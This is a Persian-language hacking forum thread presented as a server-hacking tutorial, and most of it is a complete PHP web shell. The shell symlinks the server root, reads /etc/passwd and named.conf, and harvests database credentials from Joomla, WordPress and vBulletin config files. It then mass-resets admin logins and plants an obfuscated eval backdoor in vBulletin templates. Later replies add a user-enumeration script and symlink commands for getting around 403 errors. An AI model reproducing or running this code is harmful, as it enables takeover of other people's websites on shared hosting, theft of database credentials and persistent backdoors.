                          $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
                           
                          flush();
                           
                           
                           
                          $site = $user['name'] ;
                           
                           
                          @symlink("/","sym/root");
                           
                          $site = $domsws[1][0];
                           
                          $ir = 'ir';
                           
                          $il = 'il';
                           
                          if (preg_match("/.^$ir/",$domsws[1][0]) or preg_match("/.^$il/",$domsws[1][0]) )
                          {
                          $site = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$domsws[1][0]."</div>";
                          }
                           
                           
                          echo "
                          <tr>
                           
                          <td>
                          <div class='dom'><a target='_blank' href=http://www.".$domsws[1][0]."/>".$site." </a> </div>
                          </td>
                           
                           
                          <td>
                          ".$user['name']."
                          </td>
                           
                           
                           
                           
                           
                           
                          <td>
                          <a href='sym/root/home/".$user['name']."/public_html' target='_blank'>symlink </a>
                          </td>
                           
                           
                          </tr></div> ";
                           
                           
                          flush();
                          flush();
                           
                          }
                          }
                          }
                          }
                           
                           
                           
                           
                          break;
                           
                           
                          /// file  symlink ///
                           
                          case 'file':
                           
                          echo'
                          The file path to symlink
                           
                          <br /><br />
                          <form method="post">
                          <input type="text" name="file" value="/home/user/public_html/file.name" size="60"/><br /><br />
                          <input type="text" name="symfile" value="file.name_sym ( Ex. :: royaliste.txt )" size="60"/><br /><br />
                          <input type="submit" value="symlink" name="symlink" /> <br /><br />
                           
                           
                           
                          </form>
                          ';
                           
                          $pfile = $_POST['file'];
                          $symfile = $_POST['symfile'];
                          $symlink = $_POST['symlink'];
                           
                          if ($symlink)
                          {
                           
                           
                          @mkdir('sym1',0777);
                          $c  = "Options Indexes FollowSymLinks \n DirectoryIndex ssssss.htm \n AddType txt .php \n AddHandler txt .php \n  AddType txt .html \n AddHandler txt .html \n Options all \n Options \n Allow from all \n Require None \n Satisfy Any";
                          $f =@fopen ('sym1/.htaccess','w');
                          @fwrite($f , $c);
                           
                          @symlink("$pfile","sym1/$symfile");
                           
                          echo '<br /><a target="_blank" href="sym1/'.$symfile.'" >'.$symfile.'</a>';
                           
                          }
                           
                           
                           
                          break;
                           
                          /// bypass read
                           
                          case 'read':
                           
                          echo "read /etc/named.conf";
                          echo "<br /><br /><form method='post' action='?sws=read&save=1'><textarea cols='80' rows='20' name='file'>";
                          flush();
                          flush();
                           
                           
                          $file = '/etc/named.conf';
                           
                           
                          $r3ad = @fopen($file, 'r');
                          if ($r3ad){
                          $content = @fread($r3ad, @filesize($file));
                          echo "".htmlentities($content)."";
                          }
                          else if (!$r3ad)
                          {
                          $r3ad = @show_source($file) ;
                          }
                          else if (!$r3ad)
                          {
                          $r3ad = @highlight_file($file);
                          }
                          else if (!$r3ad)
                          {
                          $sm = @symlink($file,'sym.txt');
                           
                           
                          if ($sm){
                          $r3ad = @fopen('sym/sym.txt', 'r');
                          $content = @fread($r3ad, @filesize($file));
                          echo "".htmlentities($content)."";
                           
                          }
                          }
                           
                           
                           
                          echo "</textarea><br /><br /><input  type='submit' value='Save'/> </form>";
                           
                           
                          if(isset($_GET['save'])){
                           
                           
                          $cont = stripcslashes($_POST['file']);
                           
                          $f = fopen('named.txt','w');
                           
                          $w = fwrite($f,$cont);
                           
                                            if($w){
                           
                                            echo '<br />save has been successfully';
                           
                                            }
                           
                          fclose($f);
                           
                           
                           
                           
                          }
                           
                           
                           
                          break;
                           
                          // passwd
                           
                          case 'passwd':
                           
                          if(isset($_GET['save']) and isset($_POST['file']) or @filesize('passwd.txt') > 0){
                           
                           
                          $cont = stripcslashes($_POST['file']);
                           
                          if(!file_exists('passwd.txt')){
                           
                          $f = @fopen('passwd.txt','w');
                           
                          $w = @fwrite($f,$cont);
                           
                          fclose($f);
                          }
                          if($w or @filesize('passwd.txt') > 0){
                          // * SHOW * //
                           
                          echo "<div class='tmp'><table align='center' width='35%'><td>Users</td><td>symlink</td><td>FTP</td>";
                          flush();
                           
                          $fil3 = file('passwd.txt');
                           
                          foreach ($fil3 as $f){
                           
                               $u=explode(':', $f);
                               $user = $u['0'];
                           
                           
                           
                          echo "
                          <tr>
                           
                           
                           
                          <td width='15%'>
                          $user
                          </td>
                           
                           
                           
                           
                           
                           
                          <td width='10%'>
                          <a href='sym/root/home/$user/public_html' target='_blank'>Symlink </a>
                          </td>
                           
                          <td width='10%'>
                          <a href='$pageFTP/sym/root/home/$user/public_html' target='_blank'>FTP</a>
                          </td>
                           
                           
                           
                          </tr></div> ";
                           
                           
                          flush();
                          flush();
                           
                           
                          }
                           
                           
                           
                           
                           
                           
                          die ("</tr></div>");
                           
                           
                                            }
                           
                           
                           
                           
                           
                          }
                           
                           
                           
                          echo "read /etc/passwd";
                          echo "<br /><br /><form method='post' action='?sws=passwd&save=1'><textarea cols='80' rows='20' name='file'>";
                          flush();
                           
                          $file = '/etc/passwd';
                           
                           
                          $r3ad = @fopen($file, 'r');
                          if ($r3ad){
                          $content = @fread($r3ad, @filesize($file));
                          echo "".htmlentities($content)."";
                          }
                          elseif(!$r3ad)
                          {
                          $r3ad = @show_source($file) ;
                          }
                          elseif(!$r3ad)
                          {
                          $r3ad = @highlight_file($file);
                          }
                          elseif(!$r3ad)
                          {
                           
                                                                      for($uid=0;$uid<1000;$uid++){
                                                                       $ara = posix_getpwuid($uid);
                                                                         if (!empty($ara)) {
                                                                            while (list ($key, $val) = each($ara)){
                                                                              print "$val:";
                                                                            }
                                                                            print "\n";
                                                                           }
                           
                                                                  }
                           
                           }
                           
                           
                          flush();
                           
                           
                          echo "</textarea><br /><br /><input  type='submit' value='&nbsp;&nbsp;symlink&nbsp;&nbsp;'/> </form>";
                          flush();
                           
                          break;
                           
                           
                           
                          case 'joomla':
                           
                          /////////////////////////////////////////////////////////////////// xxxxxxxxxxxxxxxxxxx ////////////////////////////
                           
                           
                          if(isset($_POST['s'])){
                           
                          $file = @file_get_contents('joomla.txt');
                           
                          $ex   = explode("\n",$file);
                           
                          echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
                          flush();
                           
                           
                          foreach ($ex as $exp){
                           
                          $es   = explode("||",$exp);
                           
                          $config = $es[0];
                           
                          $domin = $es[1];
                           
                          $domins = trim($domin).'';
                           
                          $readconfig  = @file_get_contents(trim($config));
                           
                          if(ereg('JConfig',$readconfig)){
                           
                           
                           
                          $pass    =  ex($readconfig,'$password = \'',"';");
                           
                          $userdb  =  ex($readconfig,'$user = \'',"';");
                           
                          $db      =  ex($readconfig,'$db = \'',"';");
                           
                          $fix     =  ex($readconfig,'$dbprefix = \'',"';");
                           
                          $tab     =  $fix.'users';
                           
                           
                          $con     = @mysql_connect('localhost',$userdb,$pass);
                           
                          $db      = @mysql_select_db($db,$con);
                           
                          $query   = @mysql_query("UPDATE `$tab`  SET `username` ='sec-w.com'");
                           
                           
                          $query3  = @mysql_query("UPDATE `$tab`  SET `password` ='44a0bcda611514625ba94e0b1c0bdaed:2iets9ydjR3iOdSuyvW54pIzyF9M1P5J'");
                           
                           
                          if ($query and $query3 ){$r = '<b style="color: #006600">Succeed </b>user [sec-w.com] pass [1]</b>';}else{$r = '<b style="color:red">failed</b>';}
                           
                          $domins = trim($domin).'';
                           
                          echo "<tr>
                          <td><a target='_blank' href='http://$domins'>$domin</a></td>
                          <td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";
                          flush();
                           
                           
                           
                          }else{
                           
                          echo "<tr>
                          <td><a target='_blank' href='http://$domins'>$domin</a></td>
                          <td><a target='_blank' href='http://$exp'>config</a></td><td><b style='color:red'>failed</b></td></tr>";
                          flush();
                           
                          }
                           
                          }
                           
                           
                           
                           
                           
                           
                           
                           
                           
                          die();
                           
                          }
                           
                          if(!is_file('named.txt')){
                           
                          $d00m = @file("/etc/named.conf");
                           
                          flush();
                           
                           
                          }else{
                           
                          $d00m = file("named.txt");
                           
                           
                          }
                          if(!$d00m)
                          {
                           
                                          die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
                          }
                          else
                           
                          {
                          echo "<div class='tmp'>
                          <form method='POST' action='$pg?sws=joomla'>
                          <input type='submit' value='Mass ching Admin' />
                          <input type='hidden' value='1' name='s' />
                          </form><br /><br />
                          <table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";
                           
                          $f = fopen('joomla.txt','w');
                           
                          foreach($d00m as $dom){
                           
                          if(eregi("zone",$dom)){
                           
                          preg_match_all('#zone "(.*)"#', $dom, $domsws);
                           
                          if(strlen(trim($domsws[1][0])) > 2){
                           
                          $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
                           
                          ///////////////////////////////////////////////////////////////////////////////////
                           
                          $wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/configuration.php";
                          $wpp=get_headers($wpl);
                          $wp=$wpp[0];
                           
                          $wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/configuration.php";
                          $wpp2=get_headers($wp2);
                          $wp12=$wpp2[0];
                           
                          $wp3=$pageURL."/sym/root/home/".$user['name']."/public_html/joomla/configuration.php";
                          $wpp3=get_headers($wp3);
                          $wp13=$wpp3[0];
                           
                           
                           ////////// joomla ////////////
                           
                          $pos = strpos($wp, "200");
                          $config="&nbsp;";
                           
                          if (strpos($wp, "200") == true )
                          {
                           $config= $wpl;
                          }
                          elseif (strpos($wp12, "200") == true)
                          {
                            $config= $wp2;
                          }
                          elseif (strpos($wp13, "200") == true)
                          {
                            $config= $wp3;
                          }
                          else
                          {
                          continue;
                           
                          }
                          flush();
                           
                          /////////////////////////////////////////////////////////////////////////////////////
                           
                          $dom = $domsws[1][0];
                           
                          $w = fwrite($f,"$config||$dom \n");
                          if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}
                           
                           
                          echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
                          <td><a href='$config'>config</a></td><td>".$r."</td></tr>";
                           
                           
                           
                           
                           
                          flush();
                           
                           
                          }
                          }
                          }
                          }
                           
                           
                          break;
                           
                          case 'wp':
                           
                          ############################ index #########################3
                           
                           
                           
                           
                           
                           
                          ########  admin ##########33
                           
                          if(isset($_POST['s'])){
                           
                          $file = @file_get_contents('wp.txt');
                           
                          $ex   = explode("\n",$file);
                           
                          echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
                          flush();
                          flush();
                           
                           
                          foreach ($ex as $exp){
                           
                          $es   = explode("||",$exp);
                           
                          $config = $es[0];
                           
                          $domin = $es[1];
                           
                          $domins = trim($domin).'';
                           
                          $readconfig  = @file_get_contents(trim($config));
                           
                          if(ereg('wp-settings.php',$readconfig)){
                           
                           
                           
                          $pass    =  ex($readconfig,"define('DB_PASSWORD', '","');");
                           
                          $userdb  =  ex($readconfig,"define('DB_USER', '","');");
                           
                          $db      =  ex($readconfig,"define('DB_NAME', '","');");
                           
                          $fix     =  ex($readconfig,'$table_prefix  = \'',"';");
                           
                          $tab     = $fix.'users';
                           
                          $con     = @mysql_connect('localhost',$userdb,$pass);
                           
                          $db      = @mysql_select_db($db,$con);
                           
                          $query   = @mysql_query("UPDATE `$tab` SET `user_login` ='sec-w.com'") or die;
                           
                          $query   = @mysql_query("UPDATE `$tab` SET `user_pass` ='$1$4z/.5i..$9aHYB.fUHEmNZ.eIKYTwx/'") or die;
                           
                           
                           
                          if ($query){$r = '<b style="color: #006600">Succeed </b>user [sec-w.com] pass [1]</b>';}
                           
                          else
                           
                          {
                           
                          $r = '<b style="color:red">failed</b>';
                           
                          }
                           
                          $domins = trim($domin).'';
                           
                          echo "<tr>
                          <td><a target='_blank' href='http://$domins'>$domin</a></td>
                          <td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";
                           
                          flush();
                          flush();
                           
                           
                           
                           
                           
                           
                          }else{
                           
                          echo "<tr>
                          <td><a target='_blank' href='http://$domins'>$domin</a></td>
                          <td><a target='_blank' href='http://$config'>config</a></td><td><b style='color:red'>failed2</b></td></tr>";
                           
                          flush();
                          flush();
                           
                          }
                           
                          }
                           
                           
                           
                           
                           
                           
                           
                           
                           
                           
                          die();
                           
                          }
                           
                          if(!is_file('named.txt')){
                           
                          $d00m = @file("/etc/named.conf");
                           
                          }else{
                           
                          $d00m = @file("named.txt");
                           
                           
                          }
                          if(!$d00m)
                          {
                           
                                          die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
                          }
                          else
                           
                          {
                          echo "<div class='tmp'>
                          <form method='POST' action='$pg?sws=wp'>
                          <input type='submit' value='Mass Change Admin' />
                          <input type='hidden' value='1' name='s' />
                          </form>
                          <br /><br />
                          <table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";
                           
                          flush();
                          flush();
                           
                          $f = fopen('wp.txt','w');
                           
                          foreach($d00m as $dom){
                           
                          if(eregi("zone",$dom)){
                           
                          preg_match_all('#zone "(.*)"#', $dom, $domsws);
                           
                          if(strlen(trim($domsws[1][0])) > 2){
                           
                          $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
                           
                          ///////////////////////////////////////////////////////////////////////////////////
                           
                          $wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/wp-config.php";
                          $wpp=get_headers($wpl);
                          $wp=$wpp[0];
                           
                          $wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/wp-config.php";
                          $wpp2=get_headers($wp2);
                          $wp12=$wpp2[0];
                           
                          $wp3=$pageURL."/sym/root/home/".$user['name']."/public_html/wp/wp-config";
                          $wpp3=get_headers($wp3);
                          $wp13=$wpp3[0];
                           
                           
                           ////////// wp ////////////
                           
                          $pos = strpos($wp, "200");
                          $config="&nbsp;";
                           
                          if (strpos($wp, "200") == true )
                          {
                           $config= $wpl;
                          }
                          elseif (strpos($wp12, "200") == true)
                          {
                            $config= $wp2;
                          }
                          elseif (strpos($wp13, "200") == true)
                          {
                            $config= $wp3;
                          }
                          else
                          {
                          continue;
                           
                          }
                          flush();
                           
                          /////////////////////////////////////////////////////////////////////////////////////
                           
                          $dom = $domsws[1][0];
                           
                          $w = fwrite($f,"$config||$dom \n");
                          if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}
                           
                           
                          echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
                          <td><a href='$config'>config</a></td><td>".$r."</td></tr>";
                          flush();
                          flush();
                           
                           
                           
                           
                           
                          flush();
                           
                           
                          }
                          }
                          }
                          }
                           
                           
                          break;
                           
                           
                          case 'vb':
                           
                           
                          if(isset($_POST['s'])){
                           
                           
                           
                          $file = @file_get_contents('vb.txt');
                           
                          $ex   = explode("\n",$file);
                           
                          echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
                           
                           
                          foreach ($ex as $exp){
                           
                          $es   = explode("||",$exp);
                           
                          $config = $es[0];
                           
                          $domin = $es[1];
                           
                          $domins = trim($domin).'';
                           
                          $readconfig  = @file_get_contents(trim($config));
                           
                          if(ereg('vBulletin',$readconfig)){
                           
                           
                           
                          $db      =  ex($readconfig,'$config[\'Database\'][\'dbname\'] = \'',"';");
                           
                          $userdb  =  ex($readconfig,'$config[\'MasterServer\'][\'username\'] = \'',"';");
                           
                          $pass    =  ex($readconfig,'$config[\'MasterServer\'][\'password\'] = \'',"';");
                           
                          $con     = @mysql_connect('localhost',$userdb,$pass);
                           
                          $db      = @mysql_select_db($db,$con);
                           
                          $shell   = "bVDPS8MwFL4L/g+vYZAWdPPiaUv14kAQFKqnUUqapjSYNKFJxCn7322abgzcIfDyvl+P7/qKs04D3tS5sJ96MMJ9b+ohDw8vTWcq31PF02yJp/WqzvEaZk2rBwWUOaF7ghAo7jrdEGS0dQh4z9zecIKUl04YOrhV4N821FEEwZQgb6SmDR8QiObsdxYheuMdRKNWSH5UxtmKn3G+v0P5TIxgNTqhWWR9rYSLAXH/RaUfgY8pbVROZ4VI0aawqN5ei/cdDlRcAiFwJEIGv4HyyLTZp4tq+/zyVOxwOASXO+yUqUI6Lm/gHxiBLDic6o62UHjGuLWQJEko99T9Gg7ApeUXJFsq5EX+AR7yPw==" ;
                           
                          $crypt  = "{\${eval(gzinflate(base64_decode(\'";
                           
                          $crypt .= "$shell";
                           
                          $crypt .= "\')))}}{\${exit()}}</textarea>";
                           
                          $sqlfaq = "UPDATE template SET template ='".$crypt."' WHERE title ='FAQ'" ;
                           
                          $query  = @mysql_query($sqlfaq,$con);
                           
                           
                           
                          if ($query){$r = '<b style="color: #006600">Succeed</b> shell in search.php';}
                           
                          else
                           
                          {
                           
                          $r = '<b style="color:red">failed</b>';
                           
                          }
                           
                          $domins = trim($domin).'';
                           
                          echo "<tr>
                          <td><a target='_blank' href='http://$domins'>$domin</a></td>
                          <td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";
                           
                           
                           
                           
                           
                           
                           
                          }else{
                           
                          echo "<tr>
                          <td><a target='_blank' href='http://$domins'>$domin</a></td>
                          <td><a target='_blank' href='http://$config'>config</a></td><td><b style='color:red'>failed2</b></td></tr>";
                          }
                           
                          }
                           
                           
                           
                           
                           
                           
                           
                           
                           
                           
                          die();
                           
                          }
                           
                          if(!is_file('named.txt')){
                           
                          $d00m = file("/etc/named.conf");
                           
                          }else{
                           
                          $d00m = file("named.txt");
                           
                           
                          }
                          if(!$d00m)
                          {
                           
                                          die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
                          }
                          else
                           
                          {
                          echo "<div class='tmp'>
                          <form method='POST' action='$pg?sws=vb'>
                          <input type='submit' value='Inject shell' />
                          <input type='hidden' value='1' name='s' />
                          </form>
                          <br /><br />
                          <table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";
                           
                          $f = fopen('vb.txt','w');
                           
                          foreach($d00m as $dom){
                           
                          if(eregi("zone",$dom)){
                           
                          preg_match_all('#zone "(.*)"#', $dom, $domsws);
                           
                          if(strlen(trim($domsws[1][0])) > 2){
                           
                          $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
                           
                          ///////////////////////////////////////////////////////////////////////////////////
                           
                          $wpl=$pageURL."/sym/root/home/".$user['name']."/includes/config.php";
                          $wpp=get_headers($wpl);
                          $wp=$wpp[0];
                           
                          $wp2=$pageURL."/sym/root/home/".$user['name']."/vb/includes/config.php";
                          $wpp2=get_headers($wp2);
                          $wp12=$wpp2[0];
                           
                          $wp3=$pageURL."/sym/root/home/".$user['name']."/forum/includes/config.php";
                          $wpp3=get_headers($wp3);
                          $wp13=$wpp3[0];
                           
                           
                           ////////// vb ////////////
                           
                          $pos = strpos($wp, "200");
                          $config="&nbsp;";
                           
                          if (strpos($wp, "200") == true )
                          {
                           $config= $wpl;
                          }
                          elseif (strpos($wp12, "200") == true)
                          {
                            $config= $wp2;
                          }
                          elseif (strpos($wp13, "200") == true)
                          {
                            $config= $wp3;
                          }
                          else
                          {
                          continue;
                           
                          }
                          flush();
                           
                          /////////////////////////////////////////////////////////////////////////////////////
                           
                          $dom = $domsws[1][0];
                           
                          $w = fwrite($f,"$config||$dom \n");
                          if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}
                           
                           
                          echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
                          <td><a href='$config'>config</a></td><td>".$r."</td></tr>";
                           
                           
                           
                           
                           
                          flush();
                           
                           
                          }
                          }
                          }
                          }
                           
                           
                           
                           
                           
                           
                           
                           
                          break;
                           
                          case 'help':
                           
                          echo "<div class='tmp'>
                          <table align='center' width='40%'><td>function</td><td>Case</td>";
                           
                           
                          $safe_mode = ini_get('safe_mode');
                               if($safe_mode){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
                           
                          echo "<tr><td>Safe Mode</td><td>$r</td>";
                           
                          $fun = function_exists('symlink');
                               if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
                           
                          echo "<tr><td>function symlink</td><td>$r</td>";
                           
                           
                          $fun = function_exists('file');
                               if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
                           
                          echo "<tr><td>function file</td><td>$r</td>";
                           
                          $fun = function_exists('file_get_contents');
                               if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
                           
                          echo "<tr><td>function file_get_contents</td><td>$r</td>";
                           
                          $fun = function_exists('mkdir');
                               if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
                           
                          echo "<tr><td>function mkdir</td><td>$r</td>";
                           
                           
                          $fun = is_dir('sym/root');
                               if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
                           
                          echo "<tr><td>Permission denied</td><td>$r</td>";
                           
                           
                          $fun = preg_match('/Forbidden/',@file_get_contents('sym/root') or !@file_get_contents('sym/root'));
                               if($fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #006600'>True</b>";}
                           
                          echo "<tr><td>Forbidden</td><td>$r</td>";
                           
                           
                           
                           
                          echo "</table></div>";
                           
                           
                           
                          break;
                          default:
                          header("Location: $pg");
                           
                           
                           
                           
                          }
                           
                           
                          /// home ///
                          }else
                          {
                           
                           
                          echo '<br /><br /><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
                          echo '<input type="file" name="file" value="Choose file" size="60" ><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
                          if( $_POST['_upl'] == "Upload" ) {
                              if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<br /><br /><b>Uploaded successful !!<br><br>'; }
                              else { echo '<br /><br />Not uploaded !!<br><br>'; }
                           
                           
                          }
                           
                              echo '
                          <br /><br /><br /></b></b><div class="fot">Cod3d by <b>S3n4t00r</b> Idea by <b>Mr.Alsa3ek</b>
                          <br /><br />
                          <b style="color: red";>   Sec-w.Com  </b>
                          <br /><br />
                          Muslims Hackers</div> ';
                           
                          }
                           
                           
                          function ex($text,$a,$b){
                          $explode = explode($a,$text);
                          $explode = explode($b,$explode[1]);
                          return $explode[0];
                          }
                           
                           
                           
                          echo '</div>
                           
                          <a style="text-decoration: none; color: #F4F4F4;" title="???????"/href="http://sec-w.com/cc">???????</a>
                           
                          <a style="text-decoration: none; color: #F4F4F4;" title="???? ???????"/href="http://sec-w.com/cc">???? ???????</a>
                           
                           
                           
                          </body>
                           
                          </html>
                          ';
                           
                          ?>
                          [/align]

                          اگر موفق به خواندن passwd نشدید نیز میتوانید اسکریپت زیر را تست کنید .

                          iranhack.com/acc/thread-1209-post-3217.html#pid3217

                          [align=left]
                          کد:
                          <?php
                          for($uid=0;$uid<60000;$uid++){
                          $ara = @posix_getpwuid($uid);
                          if (!empty($ara)) {
                          while (list ($key, $val) = each($ara)){
                          print "$val:";
                          }
                          print "\n";
                          }
                          }
                          ?>
                          [/align]
                          [align=center][/align]

                          نظر


                          • #14
                            RE: :: تاپیک آموزش سرور هکینگ ::

                            نوشته اصلی توسط adonis27
                            اگه پرم خوندن نداسته باشیم و ارور 403 بده باید چیکار کنیم؟
                            بعضی مواقع جواب میده :

                            ln -s /home/user/public_html/configuration.php xpr.avi

                            ln -s /home/user/public_html/configuration.php xpr

                            ln -s /home/user/public_html/configuration.php xpr.xml

                            ln -s /home/user/public_html/configuration.php xpr'

                            اگرم گیرش به perm بود cp رو یه تست بزن . مثلا :

                            cp xpr.txt xpr2.txt

                            پرم رو هم تغییر بده به 755

                            chmod 755 file.txt
                            [align=center][/align]

                            نظر


                            • #15
                              RE: :: تاپیک آموزش سرور هکینگ ::

                              آموزش الولتون هم پاك شده لطفا دوباره بزاريد ممنون
                              ><><><><><><><><>><NaMe Of GoD><><><><><><><><><

                              نظر

                              صبر کنید ..
                              X